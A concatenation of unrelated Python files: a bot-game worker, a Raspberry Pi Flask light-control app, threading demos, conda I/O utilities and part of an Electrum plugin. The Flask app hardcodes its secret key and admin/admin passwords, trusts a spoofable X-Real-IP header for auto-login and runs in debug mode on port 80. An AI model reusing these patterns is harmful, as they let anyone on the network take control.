bot_group = "bots_{}".format(user_index)
bot_cgroup = "bot_{}".format(user_index)
# We want 775 so that the bot can create files still; leading 2
# is equivalent to g+s which forces new files to be owned by the
# group
give_ownership(bot_dir, bot_group, 0o2775)
bot_command = BOT_COMMAND.format(
cgroup=bot_cgroup,
bot_dir=bot_dir,
bot_group=bot_group,
bot_user=bot_user,
runfile=RUNFILE,
)
bot_name = "{} v{}".format(user["username"], user["version_number"])
return bot_command, bot_name, bot_dir
def runGame(environment_parameters, users, offset=0):
with tempfile.TemporaryDirectory(dir=TEMP_DIR) as temp_dir:
shutil.copy(ENVIRONMENT, os.path.join(temp_dir, ENVIRONMENT))
command = [
"./" + ENVIRONMENT,
"--results-as-json",
]
for key, value in environment_parameters.items():
command.append("--{}".format(key))
if value:
command.append("{}".format(value))
# Make sure bots have access to the temp dir as a whole
# Otherwise, Python can't import modules from the bot dir
# Based on strace, Python lstat()s the full dir path to the dir it's
# in, and fails when it tries to lstat the temp dir, which this
# fixes
os.chmod(temp_dir, 0o755)
for user_index, user in enumerate(users):
bot_command, bot_name, bot_dir = setupParticipant(user_index + offset, user, temp_dir)
command.append(bot_command)
command.append("-o")
command.append(bot_name)
user['bot_dir'] = bot_dir
logging.debug("Run game command %s\n" % command)
print(command)
logging.debug("Waiting for game output...\n")
lines = subprocess.Popen(
command,
stdout=subprocess.PIPE).stdout.read().decode('utf-8').split('\n')
logging.debug("\n-----Here is game output: -----")
logging.debug("\n".join(lines))
logging.debug("--------------------------------\n")
# tempdir will automatically be cleaned up, but we need to do things
# manually because the bot might have made files it owns
for user_index, user in enumerate(users):
# keep any bot logs
user['bot_logs'] = ''
log_files_read = 0
for filename in os.listdir(user['bot_dir']):
try:
_, ext = os.path.splitext(filename)
if ext.lower() == '.log':
log_files_read += 1
user['bot_logs'] += '===== Log file {}\n'.format(filename)
with open(os.path.join(user['bot_dir'], filename)) as logfile:
user['bot_logs'] += logfile.read(MAX_LOG_FILE_SIZE)
user['bot_logs'] += '\n===== End of log {}\n'.format(filename)
except Exception:
# Ignore log and move on if we fail
pass
if log_files_read >= MAX_LOG_FILES:
break
bot_user = "bot_{}".format(user_index + offset)
rm_as_user(bot_user, temp_dir)
# The processes won't necessarily be automatically cleaned up, so
# let's do it ourselves
util.kill_processes_as(bot_user)
return lines
def parseGameOutput(output, users):
users = copy.deepcopy(users)
logging.debug(output)
result = json.loads(output)
for player_tag, stats in result["stats"].items():
player_tag = int(player_tag)
users[player_tag]["player_tag"] = player_tag
users[player_tag]["rank"] = stats["rank"]
users[player_tag]["timed_out"] = False
users[player_tag]["log_name"] = None
for player_tag, error_log in result["error_logs"].items():
numeric_player_tag = int(player_tag)
users[numeric_player_tag]["timed_out"] = result["terminated"].get(player_tag, False)
users[numeric_player_tag]["log_name"] = os.path.basename(error_log)
return users, result
def executeGameTask(environment_parameters, users, extra_metadata, gameResult):
"""Downloads compiled bots, runs a game, and posts the results of the game"""
logging.debug("Running game with parameters {}\n".format(environment_parameters))
logging.debug("Users objects {}\n".format(users))
logging.debug("Extra metadata {}\n".format(extra_metadata))
raw_output = '\n'.join(runGame(
environment_parameters, users,
extra_metadata.get("offset", 0)))
users, parsed_output = parseGameOutput(raw_output, users)
gameResult(users, parsed_output, extra_metadata)
# Clean up game logs and replays
filelist = glob.glob("*.log")
for f in filelist:
os.remove(f)
os.remove(parsed_output["replay"])
# Make sure game processes exit
subprocess.run(["pkill", "--signal", "9", "-f", "cgexec"])
def _set_logging():
logging.basicConfig(filename=LOG_FILENAME, level=logging.INFO)
logging.getLogger('werkzeug').setLevel(logging.ERROR)
logging.getLogger('requests').setLevel(logging.CRITICAL)
outLog = logging.StreamHandler(sys.stdout)
outLog.setLevel(logging.DEBUG)
outLog.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s]: %(message)s'))
logging.getLogger().addHandler(outLog)
def set_time():
global LOCK
with LOCK:
global TIME
TIME = datetime.datetime.now()
logging.info("Setting time to {}".format(TIME))
def is_time_up_to_date():
global LOCK
with LOCK:
global TIME
current_time = datetime.datetime.now()
logging.info("TIME DIFFERENCE: {}".format((current_time - TIME).total_seconds()))
if (current_time - TIME).total_seconds() > TIME_THRESHOLD:
return False
return True
@app.route('/health_check')
def health_check():
if is_time_up_to_date():
return "Alive", 200
else:
return "Dead. Last alive at {}".format(TIME), 503
def main(args):
_set_logging()
logging.info("Starting up worker at {}".format(socket.gethostname()))
threading.Thread(target=app.run, kwargs={'host':'0.0.0.0', 'port':5001, 'threaded':True}).start()
while True:
set_time()
try:
logging.debug("\n\n\nQuerying for new task at time %s (GMT)\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
task = backend.getTask(args.task_type)
if "type" in task and (task["type"] == "compile" or task["type"] == "game"):
logging.debug("Got new task at time %s (GMT)\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
logging.debug("Task object %s\n" % str(task))
if task["type"] == "compile":
logging.debug("Running a compilation task...\n")
executeCompileTask(task["user"], task["bot"], backend)
else:
logging.debug("Running a game task...\n")
executeGameTask(task.get("environment_parameters", {}),
task["users"], {
"challenge": task.get("challenge"),
}, backend.gameResult)
elif task.get("type") == "ondemand":
environment_params = task["environment_parameters"]
extra_metadata = {
"task_user_id": task["task_user_id"],
"offset": int(args.user_offset),
}
try:
executeGameTask(environment_params,
task["users"],
extra_metadata,
backend.ondemandResult)
except OndemandCompileError as e:
backend.ondemandError(
task["users"],
extra_metadata,
e.language, e.log
)
else:
logging.debug("No task available at time %s (GMT). Sleeping...\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
sleep(random.randint(1, 4))
except Exception as e:
logging.exception("Error on get task %s\n" % str(e))
logging.debug("Sleeping...\n")
sleep(random.randint(1, 4))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--task-type", default="task")
parser.add_argument("--user-offset", default=0)
args = parser.parse_args()
main(args)
|
Light_Control_GPIO.py
|
from flask import Flask, g, render_template, request, session, url_for, redirect
import time
import datetime
import threading
import csv
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
#GPIO 0 to 11 in output mode at 0
for i in range(12):
GPIO.setup(i, GPIO.OUT, initial=GPIO.LOW)
app = Flask(__name__)
app.secret_key = 'somesecretkeythatonlyishouldknow'
app.session_cookie_name = 'MyBeautifulCookies'
authorize_ip = ["localhost", "127.0.0.1", "172.16.32.199"]
buttonSts_p1 = ["/static/img/img_off.png"] * 8
buttonSts_p2 = ["/static/img/img_off.png"] * 8
color = ["#333333"] * 8
warning = ""
class User:
def __init__(self, id, username, password):
self.id = id
self.username = username
self.password = password
def __repr__(self):
return f'<User: {self.username}>'
users = []
users.append(User(id=1, username='elo', password='elo'))
users.append(User(id=2, username='admin', password='admin'))
def gpio_modif():
for i in range(8):
if buttonSts_p1[i] == "/static/img/img_off.png":
#OFF
GPIO.output(i, 0)
else:
#ON
GPIO.output(i, 1)
def getTime():
t = time.localtime()
current_time = time.strftime("%H:%M", t)
return current_time
@app.before_request
def before_request():
g.user = None
ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
for i in authorize_ip:
if ip == i:
if 'user_id' in session:
user = [x for x in users if x.id == session['user_id']][0]
g.user = user
else :
users.append(User(id=3, username='local', password='local'))
user = [x for x in users if x.id == 3][0]
session['user_id'] = user.id
user = [x for x in users if x.id == session['user_id']][0]
g.user = user
return redirect(url_for('page1'))
if 'user_id' in session:
user = [x for x in users if x.id == session['user_id']][0]
g.user = user
@app.route("/", methods=['POST', 'GET'])
def login():
current_time = getTime()
if request.method == 'POST':
session.pop('user_id', None)
username = request.form['username']
password = request.form['password']
try:
user = [x for x in users if x.username == username][0]
try:
if user and user.password == password:
session['user_id'] = user.id
return redirect(url_for('page1'))
except:
return redirect(url_for('login'))
except:
return redirect(url_for('login'))
return render_template("login.html", time=current_time, warning=warning)
@app.route("/page1", methods = ['POST', 'GET'])
def page1():
current_time = getTime()
if not g.user:
return redirect(url_for('login'))
if all(elem == "/static/img/img_on.png" for elem in buttonSts_p1):
buttonSts_p2[0] = "/static/img/img_on.png"
else:
buttonSts_p2[0] = "/static/img/img_off.png"
if request.method == 'POST':
if request.form['button_p1'] == '1':
if buttonSts_p1[0] == "/static/img/img_on.png":
buttonSts_p1[0] = "/static/img/img_off.png"
color[0] = "#333333"
else:
buttonSts_p1[0] = "/static/img/img_on.png"
color[0] = "#FFFFFF"
elif request.form['button_p1'] == '2':
if buttonSts_p1[1] == "/static/img/img_on.png":
buttonSts_p1[1] = "/static/img/img_off.png"
color[1] = "#333333"
else:
buttonSts_p1[1] = "/static/img/img_on.png"
color[1] = "#FFFFFF"
elif request.form['button_p1'] == '3':
if buttonSts_p1[2] == "/static/img/img_on.png":
buttonSts_p1[2] = "/static/img/img_off.png"
color[2] = "#333333"
else:
buttonSts_p1[2] = "/static/img/img_on.png"
color[2] = "#FFFFFF"
elif request.form['button_p1'] == '4':
if buttonSts_p1[3] == "/static/img/img_on.png":
buttonSts_p1[3] = "/static/img/img_off.png"
color[3] = "#333333"
else:
buttonSts_p1[3] = "/static/img/img_on.png"
color[3] = "#FFFFFF"
elif request.form['button_p1'] == '5':
if buttonSts_p1[4] == "/static/img/img_on.png":
buttonSts_p1[4] = "/static/img/img_off.png"
color[4] = "#333333"
else:
buttonSts_p1[4] = "/static/img/img_on.png"
color[4] = "#FFFFFF"
elif request.form['button_p1'] == '6':
if buttonSts_p1[5] == "/static/img/img_on.png":
buttonSts_p1[5] = "/static/img/img_off.png"
color[5] = "#333333"
else:
buttonSts_p1[5] = "/static/img/img_on.png"
color[5] = "#FFFFFF"
elif request.form['button_p1'] == '7':
if buttonSts_p1[6] == "/static/img/img_on.png":
buttonSts_p1[6] = "/static/img/img_off.png"
color[6] = "#333333"
else:
buttonSts_p1[6] = "/static/img/img_on.png"
color[6] = "#FFFFFF"
elif request.form['button_p1'] == '8':
if buttonSts_p1[7] == "/static/img/img_on.png":
buttonSts_p1[7] = "/static/img/img_off.png"
color[7] = "#333333"
else:
buttonSts_p1[7] = "/static/img/img_on.png"
color[7] = "#FFFFFF"
elif request.form['button_p1'] == 'page_2':
return redirect(url_for('page2'))
else:
pass
gpio_modif()
return render_template('page1.html', button=buttonSts_p1, color=color, time=current_time, warning=warning)
@app.route("/page2", methods = ['POST', 'GET'])
def page2():
current_time = getTime()
if not g.user:
return redirect(url_for('login'))
if request.method == 'POST':
if request.form['button_p1'] == '1':
buttonSts_p2[0] = "/static/img/img_on.png"
for i in range(8):
buttonSts_p1[i] = "/static/img/img_on.png"
color[i] = "#FFFFFF"
elif request.form['button_p1'] == '2':
buttonSts_p2[1] = "/static/img/img_off.png"
for i in range(8):
buttonSts_p1[i] = "/static/img/img_off.png"
buttonSts_p2[i] = "/static/img/img_off.png"
color[i] = "#333333"
elif request.form['button_p1'] == '3':
buttonSts_p2[0] = "/static/img/img_off.png"
buttonSts_p2[1] = "/static/img/img_off.png"
for i in range(0, 8, 2):
color[i] = "#FFFFFF"
color[i + 1] = "#333333"
buttonSts_p1[i] = "/static/img/img_on.png"
buttonSts_p1[i + 1] = "/static/img/img_off.png"
elif request.form['button_p1'] == '4':
buttonSts_p2[0] = "/static/img/img_off.png"
buttonSts_p2[1] = "/static/img/img_off.png"
for i in range(0, 8):
if i < 3:
color[i] = "#FFFFFF"
buttonSts_p1[i] = "/static/img/img_on.png"
else :
color[i] = "#333333"
buttonSts_p1[i] = "/static/img/img_off.png"
elif request.form['button_p1'] == '5':
buttonSts_p2[0] = "/static/img/img_off.png"
buttonSts_p2[1] = "/static/img/img_off.png"
for i in range(0, 8):
if i > 3 and i != 7:
color[i] = "#FFFFFF"
buttonSts_p1[i] = "/static/img/img_on.png"
else:
color[i] = "#333333"
buttonSts_p1[i] = "/static/img/img_off.png"
elif request.form['button_p1'] == 'page_1':
return redirect(url_for('page1'))
else:
pass
gpio_modif()
return render_template('page2.html', button=buttonSts_p2, color=color, time=current_time, warning=warning)
@app.route("/settings", methods = ['POST', 'GET'])
def settings(setting=None):
if g.user.id == 3:
return redirect(url_for('page1'))
if not g.user.username == "admin":
return redirect(url_for('login'))
current_time = getTime()
if request.method == 'POST':
check1 = request.form.get('Auto on')
time1 = request.form.get('time Auto on')
check2 = request.form.get('Auto off')
time2 = request.form.get('time Auto off')
file = open('config.csv', "w", newline='')
header = ['name','state','param1']
csvf = csv.DictWriter(file, fieldnames=header)
csvf.writeheader()
csvf.writerow({'name': 'Auto on', 'state': check1, 'param1': time1})
csvf.writerow({'name': 'Auto off', 'state': check2, 'param1': time2})
file.close()
return redirect(url_for('page1'))
with open('config.csv', "r") as f:
csvreader = csv.reader(f)
header = next(csvreader)
rows = []
for row in csvreader:
rows.append(row)
f.close()
return render_template('settings.html', time=current_time, settings=rows, warning=warning)
@app.before_first_request
def activate_job():
def run_job():
while True:
t = getTime()
with open('config.csv', "r") as f:
csvreader = csv.reader(f)
header = next(csvreader)
rows = []
for row in csvreader:
rows.append(row)
f.close()
day = datetime.datetime.today().weekday()
#0 monday / 6 sunday
#ALL ON and ALL OFF
if rows[0][1] == 'on' and t == rows[0][2] and day < 5:
buttonSts_p2[0] = "/static/img/img_on.png"
for i in range(8):
buttonSts_p1[i] = "/static/img/img_on.png"
color[i] = "#FFFFFF"
gpio_modif()
if rows[1][1] == 'on' and t == rows[1][2] and day < 5:
buttonSts_p2[1] = "/static/img/img_off.png"
for i in range(8):
buttonSts_p1[i] = "/static/img/img_off.png"
buttonSts_p2[i] = "/static/img/img_off.png"
color[i] = "#333333"
gpio_modif()
with open('/sys/class/thermal/thermal_zone0/temp', 'r') as ftemp:
global warning
temp = int(ftemp.read()) / 1000
if temp > 60:
warning = "Temp = " + str(int(temp)) + "°"
else:
warning = ""
time.sleep(60)
thread = threading.Thread(target=run_job)
thread.start()
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80, debug=True,)
GPIO.cleanup()
|
multithread_fib.py
|
'''Compute fibonacci numbers with multiple threads to show the GIL'''
import random
import threading
import compute
import syscall
def thread_func_monitor(func):
def wrapper(*args, **kargs):
print(f'Function {func.__name__} executed by thread {syscall.gettid()}')
return func(*args, **kargs)
return wrapper
@thread_func_monitor
def apply(data, func, start, stop, results):
'''Apply function func on each element of data in the range [start, stop['''
results.extend([func(x) for x in data[start:stop]])
def main(nthreads=4):
numbers = random.choices(population=range(23, 26), k=300)
chunk = len(numbers) // nthreads
starts = range(0, nthreads * chunk, chunk)
stops = list(range(chunk, nthreads * chunk + 1, chunk))
stops[-1] = len(numbers)
threads = []
threads_results = []
for start, stop in zip(starts, stops):
threads_results.append([])
results = threads_results[-1]
t = threading.Thread(target=apply, args=(numbers, compute.fib, start, stop, results))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
for results in threads_results:
print(' -> ', results)
if __name__ == '__main__':
main()
|
mp.py
|
from multiprocessing import Process, Value, Array, Lock
import numpy as np
# not used in the final code, but some multiprocessing practice in python.
x = [1]
def f(a, lock):
lock.acquire()
for i in range(len(a)):
a[i] = -a[i]
lock.release()
if __name__ == '__main__':
lock = Lock()
jobs = []
arr = Array('i', range(11))
for i in range(11):
p = Process(target=f, args=(arr, lock))
jobs.append(p)
p.start()
for i in range(11):
jobs[i].join()
|
io.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2012 Anaconda, Inc
# SPDX-License-Identifier: BSD-3-Clause
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import defaultdict
from concurrent.futures import ThreadPoolExecutor, _base, as_completed
from concurrent.futures.thread import _WorkItem
from contextlib import contextmanager
from enum import Enum
from errno import EPIPE, ESHUTDOWN
from functools import wraps
from itertools import cycle
import json
import logging # lgtm [py/import-and-import-from]
from logging import CRITICAL, Formatter, NOTSET, StreamHandler, WARN, getLogger
import os
from os.path import dirname, isdir, isfile, join
import signal
import sys
from threading import Event, Thread
from time import sleep, time
from .compat import StringIO, iteritems, on_win
from .constants import NULL
from .path import expand
from .._vendor.auxlib.decorators import memoizemethod
from .._vendor.auxlib.logz import NullHandler
from .._vendor.auxlib.type_coercion import boolify
from .._vendor.tqdm import tqdm
log = getLogger(__name__)
class DeltaSecondsFormatter(Formatter):
"""
Logging formatter with additional attributes for run time logging.
Attributes:
`delta_secs`:
Elapsed seconds since last log/format call (or creation of logger).
`relative_created_secs`:
Like `relativeCreated`, time relative to the initialization of the
`logging` module but conveniently scaled to seconds as a `float` value.
"""
def __init__(self, fmt=None, datefmt=None):
self.prev_time = time()
super(DeltaSecondsFormatter, self).__init__(fmt=fmt, datefmt=datefmt)
def format(self, record):
now = time()
prev_time = self.prev_time
self.prev_time = max(self.prev_time, now)
record.delta_secs = now - prev_time
record.relative_created_secs = record.relativeCreated / 1000
return super(DeltaSecondsFormatter, self).format(record)
if boolify(os.environ.get('CONDA_TIMED_LOGGING')):
_FORMATTER = DeltaSecondsFormatter(
"%(relative_created_secs) 7.2f %(delta_secs) 7.2f "
"%(levelname)s %(name)s:%(funcName)s(%(lineno)d): %(message)s"
)
else:
_FORMATTER = Formatter(
"%(levelname)s %(name)s:%(funcName)s(%(lineno)d): %(message)s"
)
def dashlist(iterable, indent=2):
return ''.join('\n' + ' ' * indent + '- ' + str(x) for x in iterable)
class ContextDecorator(object):
"""Base class for a context manager class (implementing __enter__() and __exit__()) that also
makes it a decorator.
"""
# TODO: figure out how to improve this pattern so e.g. swallow_broken_pipe doesn't have to be instantiated # NOQA
def __call__(self, f):
@wraps(f)
def decorated(*args, **kwds):
with self:
return f(*args, **kwds)
return decorated
class SwallowBrokenPipe(ContextDecorator):
# Ignore BrokenPipeError and errors related to stdout or stderr being
# closed by a downstream program.
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if (exc_val
and isinstance(exc_val, EnvironmentError)
and getattr(exc_val, 'errno', None)
and exc_val.errno in (EPIPE, ESHUTDOWN)):
return True
swallow_broken_pipe = SwallowBrokenPipe()
class CaptureTarget(Enum):
"""Constants used for contextmanager captured.
Used similarly like the constants PIPE, STDOUT for stdlib's subprocess.Popen.
"""
STRING = -1
STDOUT = -2
@contextmanager
def env_var(name, value, callback=None):
# NOTE: will likely want to call reset_context() when using this function, so pass
# it as callback
name, value = str(name), str(value)
saved_env_var = os.environ.get(name)
try:
os.environ[name] = value
if callback:
callback()
yield
finally:
if saved_env_var:
os.environ[name] = saved_env_var
else:
del os.environ[name]
if callback:
callback()
@contextmanager
def env_vars(var_map, callback=None):
# NOTE: will likely want to call reset_context() when using this function, so pass
# it as callback
saved_vars = {str(name): os.environ.get(name, NULL) for name in var_map}
try:
for name, value in iteritems(var_map):
os.environ[str(name)] = str(value)
if callback:
callback()
yield
finally:
for name, value in iteritems(saved_vars):
if value is NULL:
del os.environ[name]
else:
os.environ[name] = value
if callback:
callback()
@contextmanager
def captured(stdout=CaptureTarget.STRING, stderr=CaptureTarget.STRING):
"""Capture outputs of sys.stdout and sys.stderr.
If stdout is STRING, capture sys.stdout as a string,
if stdout is None, do not capture sys.stdout, leaving it untouched,
otherwise redirect sys.stdout to the file-like object given by stdout.
Behave correspondingly for stderr with the exception that if stderr is STDOUT,
redirect sys.stderr to stdout target and set stderr attribute of yielded object to None.
Args:
stdout: capture target for sys.stdout, one of STRING, None, or file-like object
stderr: capture target for sys.stderr, one of STRING, STDOUT, None, or file-like object
Yields:
CapturedText: has attributes stdout, stderr which are either strings, None or the
corresponding file-like function argument.
"""
# NOTE: This function is not thread-safe. Using within multi-threading may cause spurious
# behavior of not returning sys.stdout and sys.stderr back to their 'proper' state
# """
# Context manager to capture the printed output of the code in the with block
#
# Bind the context manager to a variable using `as` and the result will be
# in the stdout property.
#
# >>> from conda.common.io import captured
# >>> with captured() as c:
# ... print('hello world!')
# ...
# >>> c.stdout
# 'hello world!\n'
# """
class CapturedText(object):
pass
saved_stdout, saved_stderr = sys.stdout, sys.stderr
if stdout == CaptureTarget.STRING:
sys.stdout = outfile = StringIO()
else:
outfile = stdout
if outfile is not None:
sys.stdout = outfile
if stderr == CaptureTarget.STRING:
sys.stderr = errfile = StringIO()
elif stderr == CaptureTarget.STDOUT:
sys.stderr = errfile = outfile
else:
errfile = stderr
if errfile is not None:
sys.stderr = errfile
c = CapturedText()
log.info("overtaking stderr and stdout")
try:
yield c
finally:
if stdout == CaptureTarget.STRING:
c.stdout = outfile.getvalue()
else:
c.stdout = outfile
if stderr == CaptureTarget.STRING:
c.stderr = errfile.getvalue()
elif stderr == CaptureTarget.STDOUT:
c.stderr = None
else:
c.stderr = errfile
sys.stdout, sys.stderr = saved_stdout, saved_stderr
log.info("stderr and stdout yielding back")
@contextmanager
def argv(args_list):
saved_args = sys.argv
sys.argv = args_list
try:
yield
finally:
sys.argv = saved_args
@contextmanager
def _logger_lock():
logging._acquireLock()
try:
yield
finally:
logging._releaseLock()
@contextmanager
def disable_logger(logger_name):
logr = getLogger(logger_name)
_lvl, _dsbld, _prpgt = logr.level, logr.disabled, logr.propagate
null_handler = NullHandler()
with _logger_lock():
logr.addHandler(null_handler)
logr.setLevel(CRITICAL + 1)
logr.disabled, logr.propagate = True, False
try:
yield
finally:
with _logger_lock():
logr.removeHandler(null_handler) # restore list logr.handlers
logr.level, logr.disabled = _lvl, _dsbld
logr.propagate = _prpgt
@contextmanager
def stderr_log_level(level, logger_name=None):
logr = getLogger(logger_name)
_hndlrs, _lvl, _dsbld, _prpgt = logr.handlers, logr.level, logr.disabled, logr.propagate
handler = StreamHandler(sys.stderr)
handler.name = 'stderr'
handler.setLevel(level)
handler.setFormatter(_FORMATTER)
with _logger_lock():
logr.setLevel(level)
logr.handlers, logr.disabled, logr.propagate = [], False, False
logr.addHandler(handler)
logr.setLevel(level)
try:
yield
finally:
with _logger_lock():
logr.handlers, logr.level, logr.disabled = _hndlrs, _lvl, _dsbld
logr.propagate = _prpgt
def attach_stderr_handler(level=WARN, logger_name=None, propagate=False, formatter=None):
# get old stderr logger
logr = getLogger(logger_name)
old_stderr_handler = next((handler for handler in logr.handlers if handler.name == 'stderr'),
None)
# create new stderr logger
new_stderr_handler = StreamHandler(sys.stderr)
new_stderr_handler.name = 'stderr'
new_stderr_handler.setLevel(NOTSET)
new_stderr_handler.setFormatter(formatter or _FORMATTER)
# do the switch
with _logger_lock():
if old_stderr_handler:
logr.removeHandler(old_stderr_handler)
logr.addHandler(new_stderr_handler)
logr.setLevel(level)
logr.propagate = propagate
def timeout(timeout_secs, func, *args, **kwargs):
"""Enforce a maximum time for a callable to complete.
Not yet implemented on Windows.
"""
default_return = kwargs.pop('default_return', None)
if on_win:
# Why does Windows have to be so difficult all the time? Kind of gets old.
# Guess we'll bypass Windows timeouts for now.
try:
return func(*args, **kwargs)
except KeyboardInterrupt: # pragma: no cover
return default_return
else:
class TimeoutException(Exception):
pass
def interrupt(signum, frame):
raise TimeoutException()
signal.signal(signal.SIGALRM, interrupt)
signal.alarm(timeout_secs)
try:
ret = func(*args, **kwargs)
signal.alarm(0)
return ret
except (TimeoutException, KeyboardInterrupt): # pragma: no cover
return default_return
class Spinner(object):
"""
Args:
message (str):
A message to prefix the spinner with. The string ': ' is automatically appended.
enabled (bool):
If False, usage is a no-op.
json (bool):
If True, will not output non-json to stdout.
"""
# spinner_cycle = cycle("⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏")
spinner_cycle = cycle('/-\\|')
def __init__(self, message, enabled=True, json=False):
self.message = message
self.enabled = enabled
self.json = json
self._stop_running = Event()
self._spinner_thread = Thread(target=self._start_spinning)
self._indicator_length = len(next(self.spinner_cycle)) + 1
self.fh = sys.stdout
self.show_spin = enabled and not json and hasattr(self.fh, "isatty") and self.fh.isatty()
def start(self):
if self.show_spin:
self._spinner_thread.start()
elif not self.json:
self.fh.write("...working... ")
self.fh.flush()
def stop(self):
if self.show_spin:
self._stop_running.set()
self._spinner_thread.join()
self.show_spin = False
def _start_spinning(self):
try:
while not self._stop_running.is_set():
self.fh.write(next(self.spinner_cycle) + ' ')
self.fh.flush()
sleep(0.10)
self.fh.write('\b' * self._indicator_length)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.stop()
else:
raise
@swallow_broken_pipe
def __enter__(self):
if not self.json:
sys.stdout.write("%s: " % self.message)
sys.stdout.flush()
self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
if not self.json:
with swallow_broken_pipe:
if exc_type or exc_val:
sys.stdout.write("failed\n")
else:
sys.stdout.write("done\n")
sys.stdout.flush()
class ProgressBar(object):
def __init__(self, description, enabled=True, json=False):
"""
Args:
description (str):
The name of the progress bar, shown on left side of output.
enabled (bool):
If False, usage is a no-op.
json (bool):
If true, outputs json progress to stdout rather than a progress bar.
Currently, the json format assumes this is only used for "fetch", which
maintains backward compatibility with conda 4.3 and earlier behavior.
"""
self.description = description
self.enabled = enabled
self.json = json
if json:
pass
elif enabled:
bar_format = "{desc}{bar} | {percentage:3.0f}% "
try:
self.pbar = tqdm(desc=description, bar_format=bar_format, ascii=True, total=1,
file=sys.stdout)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.enabled = False
else:
raise
def update_to(self, fraction):
try:
if self.json and self.enabled:
sys.stdout.write('{"fetch":"%s","finished":false,"maxval":1,"progress":%f}\n\0'
% (self.description, fraction))
elif self.enabled:
self.pbar.update(fraction - self.pbar.n)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.enabled = False
else:
raise
def finish(self):
self.update_to(1)
@swallow_broken_pipe
def close(self):
if self.enabled and self.json:
sys.stdout.write('{"fetch":"%s","finished":true,"maxval":1,"progress":1}\n\0'
% self.description)
sys.stdout.flush()
elif self.enabled:
self.pbar.close()
class ThreadLimitedThreadPoolExecutor(ThreadPoolExecutor):
def __init__(self, max_workers=10):
super(ThreadLimitedThreadPoolExecutor, self).__init__(max_workers)
def submit(self, fn, *args, **kwargs):
"""
This is an exact reimplementation of the `submit()` method on the parent class, except
with an added `try/except` around `self._adjust_thread_count()`. So long as there is at
least one living thread, this thread pool will not throw an exception if threads cannot
be expanded to `max_workers`.
In the implementation, we use "protected" attributes from concurrent.futures (`_base`
and `_WorkItem`). Consider vendoring the whole concurrent.futures library
as an alternative to these protected imports.
https://github.com/agronholm/pythonfutures/blob/3.2.0/concurrent/futures/thread.py#L121-L131 # NOQA
https://github.com/python/cpython/blob/v3.6.4/Lib/concurrent/futures/thread.py#L114-L124
"""
with self._shutdown_lock:
if self._shutdown:
raise RuntimeError('cannot schedule new futures after shutdown')
f = _base.Future()
w = _WorkItem(f, fn, args, kwargs)
self._work_queue.put(w)
try:
self._adjust_thread_count()
except RuntimeError:
# RuntimeError: can't start new thread
# See https://github.com/conda/conda/issues/6624
if len(self._threads) > 0:
# It's ok to not be able to start new threads if we already have at least
# one thread alive.
pass
else:
raise
return f
as_completed = as_completed
def get_instrumentation_record_file():
default_record_file = join('~', '.conda', 'instrumentation-record.csv')
return expand(os.environ.get("CONDA_INSTRUMENTATION_RECORD_FILE", default_record_file))
class time_recorder(ContextDecorator): # pragma: no cover
record_file = get_instrumentation_record_file()
start_time = None
total_call_num = defaultdict(int)
total_run_time = defaultdict(float)
def __init__(self, entry_name=None, module_name=None):
self.entry_name = entry_name
self.module_name = module_name
def _set_entry_name(self, f):
if self.entry_name is None:
if hasattr(f, '__qualname__'):
entry_name = f.__qualname__
else:
entry_name = ':' + f.__name__
if self.module_name:
entry_name = '.'.join((self.module_name, entry_name))
self.entry_name = entry_name
def __call__(self, f):
self._set_entry_name(f)
return super(time_recorder, self).__call__(f)
def __enter__(self):
enabled = os.environ.get('CONDA_INSTRUMENTATION_ENABLED')
if enabled and boolify(enabled):
self.start_time = time()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self.start_time:
entry_name = self.entry_name
end_time = time()
run_time = end_time - self.start_time
self.total_call_num[entry_name] += 1
self.total_run_time[entry_name] += run_time
self._ensure_dir()
with open(self.record_file, 'a') as fh:
fh.write("%s,%f\n" % (entry_name, run_time))
# total_call_num = self.total_call_num[entry_name]
# total_run_time = self.total_run_time[entry_name]
# log.debug('%s %9.3f %9.3f %d', entry_name, run_time, total_run_time, total_call_num)
@classmethod
def log_totals(cls):
enabled = os.environ.get('CONDA_INSTRUMENTATION_ENABLED')
if not (enabled and boolify(enabled)):
return
log.info('=== time_recorder total time and calls ===')
for entry_name in sorted(cls.total_run_time.keys()):
log.info(
'TOTAL %9.3f % 9d %s',
cls.total_run_time[entry_name],
cls.total_call_num[entry_name],
entry_name,
)
@memoizemethod
def _ensure_dir(self):
if not isdir(dirname(self.record_file)):
os.makedirs(dirname(self.record_file))
def print_instrumentation_data(): # pragma: no cover
record_file = get_instrumentation_record_file()
grouped_data = defaultdict(list)
final_data = {}
if not isfile(record_file):
return
with open(record_file) as fh:
for line in fh:
entry_name, total_time = line.strip().split(',')
grouped_data[entry_name].append(float(total_time))
for entry_name in sorted(grouped_data):
all_times = grouped_data[entry_name]
counts = len(all_times)
total_time = sum(all_times)
average_time = total_time / counts
final_data[entry_name] = {
'counts': counts,
'total_time': total_time,
'average_time': average_time,
}
print(json.dumps(final_data, sort_keys=True, indent=2, separators=(',', ': ')))
if __name__ == "__main__":
print_instrumentation_data()
|
labels.py
|
import hashlib
import requests
import threading
import json
import sys
import traceback
import base64
import electrum
from electrum.plugins import BasePlugin, hook
from electrum.i18n import _
class LabelsPlugin(BasePlugin):
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.target_host = 'labels.electrum.org'
self.wallets = {}
def encode(self, wallet, msg):
password, iv, wallet_id = self.wallets[wallet]
encrypted = electrum.bitcoin.aes_encrypt_with_iv(password, iv,
msg.encode('utf8'))
return base64.b64encode(encrypted).decode()
def decode(self, wallet, message):
